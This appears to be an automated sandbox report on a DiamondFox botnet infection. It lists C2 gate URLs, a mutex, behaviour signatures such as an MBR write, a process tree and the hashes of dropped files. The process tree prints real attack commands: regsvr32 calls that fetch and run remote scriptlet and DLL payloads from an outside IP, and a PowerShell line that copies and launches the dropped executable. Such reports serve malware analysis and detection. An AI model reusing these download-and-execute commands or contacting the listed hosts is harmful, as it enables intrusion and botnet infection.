Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    11-11-2020 15:07

General

  • Target

    http://148.163.12.101/WMndFrdk?keyword=Other&cost=0.00040&ad_campaign_id=262704&source=145866

  • Sample

    201111-nw5jsw7ban

Malware Config

Extracted

Family

diamondfox

C2

https://www.datanalysis.club/ms/gate.php

https://www.datanalysis.site/ms/gate.php

https://www.datanalysis.space/ms/gate.php

Mutex

cBFxpht5aCf0jy4gnUs3JgtqCB2O2tWJ

xor.plain

Signatures

  • DiamondFox

    DiamondFox is a multipurpose botnet with many capabilities.

  • DiamondFox payload 6 IoCs

    Detects DiamondFox payload in file/memory.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 9 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Modifies registry class 20 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://148.163.12.101/WMndFrdk?keyword=Other&cost=0.00040&ad_campaign_id=262704&source=145866
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1960 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1788
      • C:\Windows\SysWOW64\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" /s /i:"http://213.159.203.207/views/2k3q71jgf50687rn608khb81nk.sct" scrobj.dll
        3⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1452
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /s /n /i:"http://213.159.203.207/views/mg45vvc58qjg9rr9lsk7om3abk.wav" "C:\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:296
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll",CPAILoad KDYFKTCFSL
            5⤵
            • Blacklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:1504
            • C:\Windows\SysWOW64\dllhost.exe
              "C:\Windows\system32\dllhost.exe"
              6⤵
              • Checks BIOS information in registry
              • Loads dropped DLL
              • Writes to the Master Boot Record (MBR)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1628
              • C:\Users\Admin\AppData\Roaming\setup.exe
                "C:\Users\Admin\AppData\Roaming\setup.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1304
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell Copy-Item -Path 'C:\Users\Admin\AppData\Roaming\setup.exe' -Destination 'C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe';Start-Sleep -s 60;Start-Process 'C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe'
                  8⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:840

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Bootkit

1
T1067

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    baa56973ae3f0865733e888ae2a77d68

    SHA1

    4bed355f31de4e4858d8794b71c31022d5f4af43

    SHA256

    9ff4c136827d5580235b217812997cf76aea150857fa3d514e6474677b2b6a9b

    SHA512

    2a5c090462864820f30336bd33153e0abb4e00b72b35a47e6d4d7d6007ab25943a7f5b591d22279429757af91c22536ccb94b7231940006abc21ee208fd074fa

  • C:\Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
    MD5

    31afa7979b4dd60b0680558f2dd1bb99

    SHA1

    80cadd169206c58bf053be3166f08d2d7e821c63

    SHA256

    86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

    SHA512

    31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\GKLWFJS7.txt
    MD5

    6da38cf4f375ae1c59e2cf21557021f7

    SHA1

    967924b01c8acd16276f8fe9caf180751fe34173

    SHA256

    ca1a551bdee55bf1bbf0717655d633af482b098f1e415acfe18a79680af5bd9d

    SHA512

    660b06d45b83a05c6bdca25ad614746f3c21e68b156018065f9c13df42132052e2737ed691775b6aca0c8a40b73fd71fb1dd92d4ab84590a2697dece2382f10a

  • C:\Users\Admin\AppData\Roaming\setup.exe
    MD5

    1d5b46ff3cd12fd31362557299d6f488

    SHA1

    42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

    SHA256

    2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

    SHA512

    4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

  • C:\Users\Admin\AppData\Roaming\setup.exe
    MD5

    1d5b46ff3cd12fd31362557299d6f488

    SHA1

    42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

    SHA256

    2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

    SHA512

    4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

  • \Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
    MD5

    31afa7979b4dd60b0680558f2dd1bb99

    SHA1

    80cadd169206c58bf053be3166f08d2d7e821c63

    SHA256

    86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

    SHA512

    31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

  • \Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
    MD5

    31afa7979b4dd60b0680558f2dd1bb99

    SHA1

    80cadd169206c58bf053be3166f08d2d7e821c63

    SHA256

    86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

    SHA512

    31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

  • \Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
    MD5

    31afa7979b4dd60b0680558f2dd1bb99

    SHA1

    80cadd169206c58bf053be3166f08d2d7e821c63

    SHA256

    86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

    SHA512

    31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

  • \Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
    MD5

    31afa7979b4dd60b0680558f2dd1bb99

    SHA1

    80cadd169206c58bf053be3166f08d2d7e821c63

    SHA256

    86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

    SHA512

    31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

  • \Users\Admin\AppData\Local\Temp\nsu175B7D93690.tmp.dll
    MD5

    31afa7979b4dd60b0680558f2dd1bb99

    SHA1

    80cadd169206c58bf053be3166f08d2d7e821c63

    SHA256

    86ebac5645ca17fbd444b88480aefc381ac1a777542f158fcb42121b5d7d0f2a

    SHA512

    31f8d7b3e36d706de8c6cee4a5e9fab55f1c76d3fe81404acc0e1c9cc13cb18373bac2c462df15ecea5b91f046661cc0982a84db324d127f114acdc58b6ebaff

  • \Users\Admin\AppData\Roaming\setup.exe
    MD5

    1d5b46ff3cd12fd31362557299d6f488

    SHA1

    42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

    SHA256

    2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

    SHA512

    4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

  • \Users\Admin\AppData\Roaming\setup.exe
    MD5

    1d5b46ff3cd12fd31362557299d6f488

    SHA1

    42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

    SHA256

    2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

    SHA512

    4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

  • \Users\Admin\AppData\Roaming\setup.exe
    MD5

    1d5b46ff3cd12fd31362557299d6f488

    SHA1

    42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

    SHA256

    2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

    SHA512

    4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

  • \Users\Admin\AppData\Roaming\setup.exe
    MD5

    1d5b46ff3cd12fd31362557299d6f488

    SHA1

    42f5d828b03f5e4c03e9f935683b5d82e6e7dc26

    SHA256

    2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c

    SHA512

    4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23

  • memory/296-6-0x0000000000000000-mapping.dmp
  • memory/840-31-0x0000000000590000-0x0000000000591000-memory.dmp
    Filesize

    4KB

  • memory/840-34-0x0000000004870000-0x0000000004871000-memory.dmp
    Filesize

    4KB

  • memory/840-51-0x00000000065F0000-0x00000000065F1000-memory.dmp
    Filesize

    4KB

  • memory/840-50-0x00000000063A0000-0x00000000063A1000-memory.dmp
    Filesize

    4KB

  • memory/840-43-0x00000000062A0000-0x00000000062A1000-memory.dmp
    Filesize

    4KB

  • memory/840-42-0x0000000006200000-0x0000000006201000-memory.dmp
    Filesize

    4KB

  • memory/840-29-0x0000000000000000-mapping.dmp
  • memory/840-30-0x000000006EBE0000-0x000000006F2CE000-memory.dmp
    Filesize

    6.9MB

  • memory/840-37-0x00000000057C0000-0x00000000057C1000-memory.dmp
    Filesize

    4KB

  • memory/840-32-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
    Filesize

    4KB

  • memory/840-33-0x00000000023F0000-0x00000000023F1000-memory.dmp
    Filesize

    4KB

  • memory/1304-21-0x0000000000000000-mapping.dmp
  • memory/1452-5-0x0000000000000000-mapping.dmp
  • memory/1504-9-0x0000000000000000-mapping.dmp
  • memory/1532-0-0x000007FEF5E90000-0x000007FEF610A000-memory.dmp
    Filesize

    2.5MB

  • memory/1628-14-0x0000000000000000-mapping.dmp
  • memory/1788-1-0x0000000000000000-mapping.dmp
  • memory/1788-17-0x000000000B030000-0x000000000B085000-memory.dmp
    Filesize

    340KB